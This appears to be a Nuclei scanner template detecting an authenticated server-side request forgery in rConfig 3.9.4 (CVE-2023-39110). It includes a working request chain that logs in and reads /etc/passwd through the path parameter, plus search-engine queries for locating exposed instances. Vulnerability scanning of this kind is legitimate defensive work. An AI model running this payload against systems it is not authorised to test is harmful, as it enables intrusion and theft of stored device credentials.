id: CVE-2023-39110

info:
  name: rConfig 3.9.4 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
  impact: |
    Authenticated attackers can exploit SSRF through the path parameter in ajaxGetFileByPath.php to read local files and access internal network resources, potentially exposing network device configurations and credentials stored in rConfig.
  remediation: |
    Update rConfig to a version newer than 3.9.4 that validates URLs in the path parameter of ajaxGetFileByPath.php and restricts access to authorized protocols and destinations.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39110
    - https://github.com/zer0yu/CVE_Request
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-39110
    cwe-id: CWE-918
    epss-score: 0.80148
    epss-percentile: 0.99138
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2023,cve,rconfig,authenticated,ssrf,lfr,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body_1
        words:
          - 'rConfig'

      - type: status
        part: header_3
        status:
          - 200
# digest: 4a0a004730450220358201d3d9b5c10d6443b20ae36437831401a858585da77e8feeecd9505b2d17022100bf6a78c0f341ebdad56275bce858c43c6899c9d49b90a7a3bcf7db06f55322af:922c64590222798bb761d5b6d8e72950